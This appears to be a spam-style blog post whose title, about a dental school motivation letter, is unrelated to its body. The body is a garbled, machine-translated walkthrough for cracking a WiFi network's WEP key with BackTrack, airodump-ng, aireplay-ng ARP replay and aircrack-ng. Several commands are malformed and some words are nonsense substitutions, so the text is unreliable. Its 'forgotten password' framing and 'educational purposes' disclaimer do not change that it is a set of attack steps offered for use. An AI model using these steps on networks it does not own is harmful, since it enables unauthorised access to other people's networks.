Sunday, April 4, 2010

Motivation Letter To Dental School

What if I have forgotten the password to your wifi network?

Fix the sample scenario, we have a secure WiFi network WEP key, but unfortunately we can not remember her password, and your router has blown entry into lan. What can you do in this situation? Well, like what, get around security.

What do we need
  • Mug
  • stock, such as a footbridge from the notebook
  • System
  • backtrack wifi card, with the possibility of listen.
charge distributions of backtrack from its official website here

Burning iso image to disc, and boots. The system requires no installation so after a few moments, we can start working.

At the very beginning of a console launch
  1. Enter: airmon-ng and enter. You will be our wifi card.
  2. changing mode of your card by typing: iwconfig (name cards) Monitor mode
  3. Enter airodump-ng (name cards) - shows us the available networks and customers of these networks. To stop the search window click on crtl + C
  4. Enter airodump-ng-in passcode-bssid (bssid network)-c (channel) (name cards) Now, the network will be broken, you need to gather about 20 - 30 thousand DATE. This can be accelerated if it
    the network is already connected to a client.
  5. open new window Shel (do not close the previous window), you enter
    aireplay-ng - arpreplay-b (bssid network)-h (client station) (name cards)
  6. To find out the password, type in a new window ( do not close the previous windows)
    dir, then aircrack-ng-a 1-b (bssid network) passcode-01.cap
  7. password appears on the colon, we write without colons.
guide was created exclusively for educational purposes. Not responsible for
any harm resulting from its use.

0 comments:

Post a Comment